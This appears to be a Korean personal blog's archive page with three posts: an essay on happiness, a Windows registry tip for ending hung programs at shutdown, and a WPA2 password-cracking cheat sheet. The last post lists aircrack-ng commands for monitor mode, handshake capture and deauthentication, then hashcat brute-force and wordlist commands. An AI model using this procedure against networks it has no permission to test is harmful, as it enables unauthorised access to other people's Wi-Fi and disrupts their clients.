All posts by RSR

행복에 관하여

행복은 지나고 나서야 깨닫는 경우가 많다.

아 고등학교 때가 행복했구나..
군인일 때가 좋은 거였구나… 하고 말이다.

그 당시에 느끼기란 쉽지 않다.

왜 그런 걸까.

한 친구의 말로는 과거가 미화되기 때문이라는데, 일리가 있는 말이다.

좋지 않은 기억들은 사라지고 좋은 기억들만 남아서 아름답게만 보이는 걸지도 모른다.

내 생각은 이렇다.

당시의 불안감이나 고민들이 종결 났기 때문이라고.

우리는 항상 선택의 고민과 미래의 불안감에 휩싸여 산다.

대학이든, 취업이든 빨리 그 결말을 알고 싶어 한다.

하지만 걱정했던 미래가 실제로 일어나더라도

종결만 난다면 그 상황에 적응해서 잘 살아가는 우리의 모습을 볼 수 있다.

그리고 그 과정이 꽤 행복했다고 회상할 거다.

그러니 너무 걱정하지 말자.

결국 행복할 테니 말이다.

[출처] 행복에 관하여|작성자 녹황색

Windows11 AutoEndTasks and kill timeout

윈도 종료했다고 생각했는데 프로그램 하나가 종료되지 않아 PC가 계속 켜져있는 상황이 관찰되었다.

일정시간 대기하고 반응없으면 강제종료 했으면 하는데
일단 아래 레지 등록으로 해결되는지 확인 예정

It is possible to control how quickly windows automatically should end applications.

Windows can detect when an applications freezes if it don’t respond within a specific time, then prompt user:

[HKEY_CURRENT_USER \Control Panel \Desktop]
HungAppTimeout = “2500” (Default = 5000, Min = 1, Max = 65536)

Windows can be told to automatically close freezed applications without asking user first:

[HKEY_CURRENT_USER \Control Panel \Desktop]
AutoEndTasks = “1” (Default = 0, Enable = 1, Disable = 0)

Windows can force close applications at shutdown which don’t close within a specific time :

[HKEY_CURRENT_USER \Control Panel \Desktop]
WaitToKillAppTimeout = “10000” (Default = 20000, Min = 1, Max = 65536)

Note if lowering the timeout values too much, then it might lead to improper shutdown of the applications, which might lead to half-written/ invalid / faulty data that will keep the application from starting properly again.

 

https://smallvoid.com/article/windows-application-timeout.html

WPA2 Crack with hashcat

WPA2는 인증할때 salt와 kdf2값의 패킷을 수집하여 이를 BF 또는 Dict 공격하는 방법이 있다.

Enter wlan interface to monitor mode

airmon-ng start wlp4s0
airmon-ng check kill
rfkill list
rfkill unblock [dev_id]

Scan APs

airodump-ng -c 5 wlp4s0mo [–band a (for 5ghz)]
airodump-ng –bssid [bssid] -c 6 –write packet wlp4s0mo

Send Deauth Packet

aireplay-ng –deauth 100 -a [Station] wlp4s0mo

Convert cap to haccpx – out dated way

cap2hccapx.bin packet-01.cap out.haccpx

Convert cap to hc22000

hcxpcapngtool -o hash.hc22000 -E wordlist dumpfile.pcapng

Run hashcat

hashcat -m 2500 out.hccapx -a3 -?d?d?d?d?d?d?d?d -w3

hashcat -m 22000 hash.hc22000 wordlist.txt

or use aircrack-ng

$ aircrack-ng dumpfile.pcapng -w wordlist.txt